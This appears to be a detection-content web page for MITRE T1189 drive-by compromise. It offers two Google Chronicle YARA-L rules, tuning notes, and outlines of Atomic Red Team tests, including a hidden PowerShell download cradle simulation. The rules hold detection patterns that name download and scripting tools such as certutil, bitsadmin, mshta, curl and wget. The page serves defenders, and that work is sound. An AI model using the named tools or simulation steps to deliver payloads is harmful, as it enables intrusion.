T1189 Google Chronicle · YARA-L

Detect Drive-by Compromise in Google Chronicle

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Drive-by compromise occurs when exploit code is delivered through a browser, often via a compromised legitimate website (watering hole), malicious advertising (malvertising), or injected iframes/scripts. Upon visiting the malicious page, browser or plugin exploits execute code silently, commonly resulting in the browser spawning unexpected child processes, writing executables to disk, or making unusual outbound network connections that establish C2 channels. This technique is particularly dangerous because it requires no user interaction beyond visiting a page and is frequently used for targeted attacks against specific communities or industries.

MITRE ATT&CK

Tactic
Initial Access
Technique
T1189 Drive-by Compromise
Canonical reference
https://attack.mitre.org/techniques/T1189/

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral 
rule t1189_drive_by_compromise {
  meta:
    author = "df00tech"
    description = "Detects drive-by compromise: browser processes spawning suspicious child processes or writing executable/script files to user-writable directories"
    severity = "HIGH"
    priority = "HIGH"
    mitre_attack_tactic = "Initial Access"
    mitre_attack_technique = "T1189"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1189/"
    reference = "https://attack.mitre.org/techniques/T1189/"

  events:
    // Branch 1: Browser spawning suspicious child process
    $proc_event.metadata.event_type = "PROCESS_LAUNCH"
    $proc_event.principal.process.file.full_path = /(?i)(chrome\.exe|firefox\.exe|msedge\.exe|microsoftedge\.exe|iexplore\.exe|opera\.exe|brave\.exe|MicrosoftEdge\.exe)$/
    $proc_event.target.process.file.full_path = /(?i)(powershell\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|wmic\.exe|msiexec\.exe|schtasks\.exe|at\.exe|net\.exe|netsh\.exe|sc\.exe|reg\.exe|bash\.exe|sh\.exe|curl\.exe|wget\.exe)$/
    $proc_event.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    $risk_score = 85
    $detection_type = "BrowserSpawnedSuspiciousChild"
    $browser_process = $proc_event.principal.process.file.full_path
    $child_process = $proc_event.target.process.file.full_path
    $command_line = $proc_event.target.process.command_line
    $user = $proc_event.principal.user.userid

  condition:
    $proc_event
}

rule t1189_drive_by_browser_file_write {
  meta:
    author = "df00tech"
    description = "Detects drive-by compromise: browser writing executable or script files to writable user directories"
    severity = "HIGH"
    priority = "HIGH"
    mitre_attack_tactic = "Initial Access"
    mitre_attack_technique = "T1189"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1189/"

  events:
    $file_event.metadata.event_type = "FILE_CREATION"
    $file_event.principal.process.file.full_path = /(?i)(chrome\.exe|firefox\.exe|msedge\.exe|microsoftedge\.exe|iexplore\.exe|opera\.exe|brave\.exe|MicrosoftEdge\.exe)$/
    $file_event.target.file.full_path = /(?i)\.(exe|dll|bat|ps1|vbs|js|hta|scr|pif|com)$/
    $file_event.target.file.full_path = /(?i)(\\Temp\\|\\AppData\\|\\Downloads\\|\\Public\\|\\ProgramData\\)/
    not $file_event.target.file.full_path = /(?i)(\\Chrome\\|\\Firefox\\|\\Edge\\|Cache|Update|CrashReport)/
    $file_event.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    $risk_score = 80
    $detection_type = "BrowserWroteExecutableToDisk"
    $browser_process = $file_event.principal.process.file.full_path
    $dropped_file = $file_event.target.file.full_path
    $user = $file_event.principal.user.userid

  condition:
    $file_event
}
high severity high confidence

Two YARA-L 2.0 rules for Google Chronicle detecting T1189 drive-by compromise. Rule 1 fires on PROCESS_LAUNCH events where a browser process is the parent of a LOLBin or scripting engine. Rule 2 fires on FILE_CREATION events where a browser drops an executable or script payload into a user-writable directory outside normal browser cache/update paths.

Data Sources

Google Chronicle (UDM)Windows Sysmon via Chronicle ForwarderMicrosoft Defender for Endpoint via Chronicle integration

Required Tables

UDM Events (PROCESS_LAUNCH, FILE_CREATION)

False Positives & Tuning

  • Browser-based remote desktop or screen-sharing tools (e.g., TeamViewer Web, AnyDesk browser launch) that drop helper executables to AppData during session initialization
  • Enterprise intranet portals distributing VPN client updates or certificate installers that cause the browser to write .exe files to Downloads followed by msiexec.exe execution
  • Browser extensions with native messaging hosts that write compiled helper binaries to AppData/Local during first-run setup, legitimately spawning cmd.exe to complete installation
Download portable Sigma rule (.yml)

Other platforms for T1189

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Browser Spawning cmd.exe (Drive-by Code Execution Indicator)

    Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, ParentImage=chrome.exe (or reflected PID). Security Event ID 4688 if process auditing enabled. The parent-child relationship in the process tree should show chrome.exe -> cmd.exe -> whoami.exe.

  2. Test 2Browser Writing Executable to Temp Directory

    Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\update_helper.exe. The initiating process will be powershell.exe in this test (in a real scenario it would be chrome.exe or similar). File creation timestamp and SHA256 hash will be logged.

  3. Test 3Malvertising Redirect Chain DNS Lookup Pattern

    Expected signal: Sysmon Event ID 22: DNS Query for each of the five test domains, all initiated by cmd.exe within seconds of each other. Windows DNS Client Event Log will also record these queries. All queries will return NXDOMAIN as the domains do not exist.

  4. Test 4Browser Push Notification Abuse Simulation — Malicious Script via Notification Click

    Expected signal: Sysmon Event ID 1: powershell.exe process created with -WindowStyle Hidden and Invoke-WebRequest in command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:9999 (will fail with no listener, but connection attempt is logged). PowerShell ScriptBlock Log Event ID 4104 capturing the download cradle command.

Last updated: 2026-04-18 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1189 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1566.002Spearphishing LinkT1608.004Drive-by TargetT1583.008MalvertisingT1059.001PowerShellT1059.007JavaScriptT1105Ingress Tool TransferT1055Process InjectionT1053.005Scheduled TaskT1204.001Malicious LinkT1027Obfuscated Files or Information

Same Tactic: Initial Access

Popular Detections